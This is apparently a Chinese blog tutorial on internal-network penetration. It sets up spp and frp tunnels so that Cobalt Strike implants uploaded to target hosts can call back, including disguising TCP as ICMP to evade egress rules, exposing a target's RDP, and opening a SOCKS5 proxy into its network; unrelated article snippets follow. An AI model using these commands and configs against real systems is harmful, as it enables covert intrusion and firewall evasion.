内网渗透-隧道搭建ssp隧道代理工具frp内网穿透

devtools/2024/11/15 2:09:21/

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透

目录

  • 内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透
    • spp隧道代理工具
      • spp工作原理图
      • cs上线主机
        • spp代理通信
          • 服务端配置
          • 客户端配置
          • CS配置
            • 设置CS生成木马的监听器
            • 配置CS监听上线的监听器
            • 生成木马
        • spp隧道搭建
          • 服务端配置
          • 客户端配置
          • CS配置
    • frp内网穿透
      • 内网穿透上线
        • frp配置
        • CS上线
      • 配置RDP远程桌面连接内网主机
      • socks5代理转发

内网穿透:解决网络控制上线&网络通讯问题 
隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

spp隧道代理工具

支持的协议:
TCP、UDP、RUDP(可靠 UDP)、RICMP(可靠 ICMP)、RHTTP(可靠 HTTP)、KCP、Quic
支持类型:
正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理
协议和类型可以自由组合
外部代理协议和内部转发协议可以自由组合

spp工作原理图

spp详解以及下载地址:
https://github.com/esrrhs/spp/tree/0.6

image-20240529205935044

cs上线主机

spp代理通信

本工具使用简单,服务器、客户机各一条命令,就可建立连接。

服务端配置
chmod +x spp  ##添加执行权限
./spp -type server -proto tcp -listen :8888 ##启动spp,并设置为服务端,通信协议为tcp,监控本地的8888端口。

image-20240529211518533

客户端配置
chmod +x spp  ##添加执行权限
./spp -name "sx" -type reverse_proxy_client -server 服务器ip地址:8888 -fromaddr :7777 -toaddr :6666 -proxyproto tcp   ## 设置一个名字(自定义即可),连接服务器的IP地址及端口,将服务器的端口7777映射到本地的端口6666上,设置通信协议为tcp。

image-20240529212247397

服务端可进行查看连接状态

image-20240529212536488

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

设置CS生成木马的监听器

此监听器IP地址要设置为服务端的IP地址,端口为刚才设置的7777端口,相当于木马执行后,会去访问服务端的7777端,而之前的设置就是将服务端的7777端口信息转发到本地6666端口。

image-20240529213231703

配置CS监听上线的监听器

接受上线主机的监听器(shell)。

image-20240529213337949

生成木马

image-20240529213525160

将木马上传到目标主机当中,执行即可。

image-20240529213619046

成功上线

image-20240529213851077

image-20240529214357108

spp服务端代理状态:

image-20240529214020706

spp隧道搭建

若目标主机的出网TCP被禁止,但是ICMP协议是能够通信的,所以通过SPP将目标主机上的TCP流量伪装为ICMP协议转发给服务端。

服务端配置

这里设置监听的是icmp协议。

./spp -type server -proto ricmp -listen 0.0.0.0  ##这里设置监听ICMP协议,全端口

image-20240529214808484

客户端配置

客户端配置需要在目标主机上进行执行此命令,将本地的TCP伪装为ICMP所以需要转发本地的端口。

spp -name "sx" -type proxy_client -server 服务器IP -fromaddr :7777 -toaddr :6666 -proxyproto tcp -proto ricmp

在这里插入图片描述

服务端状态,成功建立隧道

image-20240530191945279

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

这生成本地的7777端口,因为客户端上已经设置了将7777端口转发了。

image-20240529221856082

生成另一个监听器,监听本地的IP地址的6666端口即可。

image-20240530192149453

监听器状态:

image-20240530192230323

生成木马,执行上线。

选择本地监听器,生成木马即可。

生成木马

将木马上传到目标机器,执行木马

image-20240530192807213

执行木马,成功上线

image-20240530192444768

spp客户端状态。并抓取流量分析,为icmp流量,伪装成功。

image-20240530192913290

ICMP流量

image-20240530194309039

spp隧道代理工具还可以伪装其他协议,具体详解见spp代理

frp内网穿透

frp 是一种快速反向代理,允许您将位于 NAT 或防火墙后面的本地服务器公开给Internet。它目前支持 TCPUDP,以及 HTTPHTTPS 协议,支持通过域名将请求转发到内部服务。frp 还提供 P2P 连接模式。

项目地址:fatedier/frp快速反向代理

对应下载即可

image-20240602192523847

内网穿透上线

frp配置

服务端配置,修改frps.ini配置文件,简单配置

image-20240602192727135

客户端配置

[common]
server_addr = 服务器ip
server_port = 8080	#连接端口[nwct]
type = tcp
local_ip = 127.0.0.1
local_port = 9999
remote_port = 8888

image-20240602194819390

服务端开启。客户端开启。观察状态,成功建立连接。

客户端开启,向服务器建立连接。

image-20240602194850298

服务端状态,成功建立连接。

image-20240602194926511

CS上线

客户端开启CS,配置监听器。需要两个监听器,一个生成木马,一个监听反弹shell。

生成木马的监听器配置:

image-20240602195030145

接受shell的监听器配置:

image-20240602202151483

生成木马,上传到目标机器当中,执行,成功上线

image-20240602202216995

上传到目标机,并执行木马

image-20240602195309111

成功上线

image-20240602195355801

配置RDP远程桌面连接内网主机

服务端简单配置不变,开启frp服务

image-20240602200039136

客户端在目标机上执行,配置文件修改

[common]
server_addr = 服务器ip
server_port = 8080[RDP]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 5555

image-20240602200604485

开启客户端服务,服务端查看状态,成功建立连接

image-20240602200619109

服务端状态

image-20240602200452644

远程桌面连接:

image-20240602200929920

成功连接

image-20240602200805779

socks5代理转发

通过代理转发,实现访问内网web服务

客户端配置:

[socks5]                
type = tcp              
remote_port = 8081
plugin = socks5

image-20240602201205354

客户端执行即可

image-20240602201230346

服务端状态:

image-20240602201254773

通过代理软件或浏览器代理插件配置代理,可访问内网服务

image-20240602201508017

访问内网web服务

image-20240602201728676

文章不妥之处,欢迎批评指正!


http://www.ppmy.cn/devtools/45930.html

相关文章

【C++】6-6 你好,输出的格式控制(对齐)

6-6 你好,输出的格式控制(对齐) 分数 10 全屏浏览 切换布局 作者 向训文 单位 惠州学院 完善程序:按示例格式输出所有分数,分数保留2位小数,分数左对齐输出在两根竖线之间 裁判测试程序样例&#xff1…

#php的pecl工具#

pecl(php拓展社区库,pear拓展版本)是一个官方的php扩展仓库,提供了众多优秀的php扩展供开发人员使用,作用主要是给php安装php扩展 1:安装PECL 首先,需要确保已安装PHP和PECL。PECL通常随着PHP一起安装,但…

【Qt知识】Qt窗口坐标系

Qt的窗口坐标体系遵循标准的计算机图形坐标系统规则 Qt窗口坐标体系特点 坐标原点:窗口坐标体系的原点位于窗口的左上角,即坐标(0, 0)位置。 轴方向: X轴:向右为正方向,随着X坐标值的增加,元素在窗口中从…

14.Redis之JAVASpring客户端

1.引入依赖 此时就会引入操作 redis 的依赖了~~ 2.yml配置 spring:redis:host: 127.0.0.1port: 8888 3.准备 前面使用 jedis,是通过 Jedis 对象里的各种方法来操作 redis 的.此处Spring 中则是通过 StringRedisTemplate 来操作 redis .最原始提供的类是 RedisTemplateStrin…

springboot 后端文件上传,多文件上传,预览接口开发实现

在Spring Boot中实现文件上传和多文件上传的功能可以通过使用Spring MVC的MultipartFile类来实现。以下是一个简单的示例代码,展示了如何实现文件上传和多文件上传的功能。 首先,创建一个用于处理文件上传请求的Controller类。在该类中,我们需要使用@PostMapping注解来接收…

如何高效测试防火墙的NAT64与ALG应用协议转换能力

在本文开始介绍如何去验证防火墙(DUT)支持NAT64 ALG应用协议转换能力之前,我们先要简单了解2个比较重要的知识点,即,NAT64和ALG这两个家伙到底是什么? 网络世界中的“翻译官” - NAT64技术 简而言之&…

从 Lerna 到现代化:原生 Workspaces 和 Changesets 的高效协作

1. 背景 最近新接手的一些 monorepo 的库项目,项目是用 lerna 进行管理的,使用过程中有一些不丝滑的地方,包括: lerna 版本过旧,使用 4.0.0(现版本 8.1.3),功能差异过大&#xff0…

ubuntu上zsh与bash切换

在Ubuntu上切换zsh和bash,你可以使用命令行。 切换到zsh: chsh -s $(which zsh)切换回bash: chsh -s $(which bash)注意:chsh命令可能需要你输入你的用户密码。 如果你想立即启动新shell,而不用重启,可以运行: ex…